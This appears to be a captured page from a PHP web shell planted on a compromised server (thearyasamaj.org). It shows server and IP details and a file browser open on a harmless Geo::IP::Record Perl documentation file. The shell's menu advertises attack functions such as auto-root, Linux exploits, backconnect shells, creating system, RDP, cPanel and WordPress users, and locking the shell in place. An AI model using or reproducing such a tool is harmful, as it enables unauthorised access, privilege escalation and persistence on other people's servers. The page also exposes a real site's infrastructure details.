Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
vendor_perl /
Geo /
IP /
[ HOME SHELL ]
Name
Size
Permission
Action
Record.pm
16.77
KB
-rw-r--r--
Record.pod
2.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Record.pod
=head1 NAME Geo::IP::Record - Contains city information for GeoIP Legacy City Edition =head1 SYNOPSIS use Geo::IP; my $gi = Geo::IP->open("/usr/local/share/GeoIP/GeoIPCity.dat", GEOIP_STANDARD); my $record = $gi->record_by_addr('24.24.24.24'); print $record->country_code, $record->country_code3, $record->country_name, $record->region, $record->region_name, $record->city, $record->postal_code, $record->latitude, $record->longitude, $record->time_zone, $record->area_code, $record->continent_code, $record->metro_code; =head1 DESCRIPTION Geo::IP::Record represents objects containing location information returned by the GeoIP Legacy City database. It works with both the commercial GeoIP Legacy City and free GeoLite Legacy City databases. =head1 OBJECT METHODS =over 4 =item $code = $record->country_code; Returns the ISO 3166 country code from the location object. =item $code3 = $record->country_code3; Returns the ISO 3166 3 letter country code from the location object. =item $name = $record->country_name; Returns the country name from the location object. =item $region = $record->region; Returns the region code from the location object. =item $region = $record->region_name; Returns the region name from the location object. =item $city = $record->city; Returns the city from the location object. =item $postal_code = $record->postal_code; Returns the postal code from the location object. =item $lat = $record->latitude; Returns the approximate latitude of the location associated with the IP address. This value is not precise and should not be used to identify a particular address or household. =item $lon = $record->longitude; Returns the approximate longitude of the location associated with the IP address. This value is not precise and should not be used to identify a particular address or household. =item $time_zone = $record->time_zone; Returns the time zone from the location object. =item $area_code = $record->area_code; Returns the area code from the location object (for city-level US locations only) =item $metro_code = $record->metro_code; Returns the metro code from the location object (for city-level US locations only) =item $continent_code = $record->continent_code; Returns the continent code from the location object. Possible continent codes are AF, AS, EU, NA, OC, SA for Africa, Asia, Europe, North America, Oceania and South America. =back =head1 VERSION 1.51 =head1 AUTHOR Copyright (c) 2016, MaxMind LLC All rights reserved. This package is free software; you can redistribute it and/or modify it under the same terms as Perl itself. =cut
Close